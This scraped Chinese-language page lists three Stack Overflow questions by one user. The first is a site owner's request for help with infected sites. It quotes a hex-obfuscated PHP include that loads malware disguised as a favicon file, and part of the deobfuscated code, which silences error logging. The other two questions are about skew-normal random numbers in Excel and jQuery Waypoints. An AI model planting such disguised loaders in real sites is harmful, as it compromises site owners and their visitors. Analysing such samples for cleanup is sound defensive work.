小编Wil*_*ggs的帖子

我的网站感染了混淆的PHP恶意软件 - 它在做什么+如何摆脱它?

我有三个网站都在同一个网络服务器上托管.最近我在其中一个网站上工作,并注意到,大约一个月前,一堆文件已被更改.具体来说,所有实例index.html都已重命名为index.html.bak.bak,并且index.php文件已放入其位置.该index.php文件是相对简单; 它们包含一个隐藏在每个网站的文件系统(看似随机文件夹)中的文件,该文件已经使用JS十六进制编码进行了混淆,然后回显原始的index.html:

<?php
/*2d4f2*/

@include "\x2fm\x6et\x2fs\x74o\x721\x2dw\x631\x2dd\x66w\x31/\x338\x304\x323\x2f4\x365\x380\x39/\x77w\x77.\x77e\x62s\x69t\x65.\x63o\x6d/\x77e\x62/\x63o\x6et\x65n\x74/\x77p\x2di\x6ec\x6cu\x64e\x73/\x6as\x2fs\x77f\x75p\x6co\x61d\x2ff\x61v\x69c\x6fn\x5f2\x391\x337\x32.\x69c\x6f";

/*2d4f2*/


echo file_get_contents('index.html.bak.bak');
Run Code Online (Sandbox Code Playgroud)

这里包含的文件是

/mnt/*snip*/www.website.com/web/content/wp-includes/js/swfupload/favicon_291372.ico

在另一个领域,它是

/mnt/*snip*/www.website2.com/web/content/wiki/maintenance/hiphop/favicon_249bed.ico

正如你可能猜到的,这些实际上并不是优惠 - 它们只是具有不同扩展名的php文件.现在,我不知道这些文件是做什么的(这就是我在这里问的原因).它们完全被混淆了,但https://malwaredecoder.com/似乎能够破解它.结果可以在这里找到,但我已经粘贴了下面的去混淆代码:

@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@error_reporting(0);
@set_time_limit(0);


if(!defined("PHP_EOL"))
{
    define("PHP_EOL", "\n");
}

if(!defined("DIRECTORY_SEPARATOR"))
{
    define("DIRECTORY_SEPARATOR", "/");
}

if (!defined('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18'))
{
    define('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18', 1);

    $data = NULL;
    $data_key = NULL;

    $GLOBALS['cs_auth'] = '8debdf89-dfb8-4968-8667-04713f279109';
    global $cs_auth;


    if (!function_exists('file_put_contents'))
    {
        function file_put_contents($n, $d, $flag = False)
        {
            $mode = $flag == 8 ? 'a' : …
Run Code Online (Sandbox Code Playgroud)

php security obfuscation malware web

13
推荐指数
1
解决办法
1万
查看次数

偏斜正态分布中的随机数(相当于NORMINV())

我正在尝试使用偏斜正态分布创建一个偏斜的随机数生成器,但我不知道如何将我的公式(使用NORMDIST())转换为NORMINV()可以生成我想要的数字的基于公式.这是我的公式:

=2/s * NORMDIST((x-m)/s, 0, 1, 0) * NORMSDIST(k*(x-m)/s)
Run Code Online (Sandbox Code Playgroud)

其中"x"是数字,"s"是比例,"m"是位置,"k"是形状.我承认我在网上找到了这个公式,但它似乎做了我想做的事,除了错误的方法.

我怎样才能做到这一点?

statistics excel distribution

7
推荐指数
1
解决办法
5894
查看次数

jQuery Waypoints不会触发

我正在尝试在我正在构建的网站中使用jQuery Waypoints,但根本无法触发它.这是我的代码:

<script src="//ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js"></script>
<script src="js/waypoints.min.js"></script>
<script>
        $(document).ready(function(){
            $('#div-a').waypoint(function() {
                console.log("waypoint a reached");
            });
            $('#div-b').waypoint(function() {
                console.log("waypoint b reached");
            });
        });
</script>
Run Code Online (Sandbox Code Playgroud)

我有没有试过这个$(document).ready(function(){.这是我的CSS:

#div-a {
    height: 1000px;
    background-color:#EAEAEA; 
}
#div-b {
    height: 1000px;
    background-color:#D8D5E2; 
}
Run Code Online (Sandbox Code Playgroud)

div包含占位符文本.div用这个css包围一个容器div:

#container {
    margin: 0;
    height: 100%;
    width: 100%;
    background-color:#8DA7CD;
    overflow:auto;
}
Run Code Online (Sandbox Code Playgroud)

谢谢.所有这一切都在http://wilsonbiggs.com/sandy/上线

html javascript css jquery jquery-waypoints

2
推荐指数
1
解决办法
3308
查看次数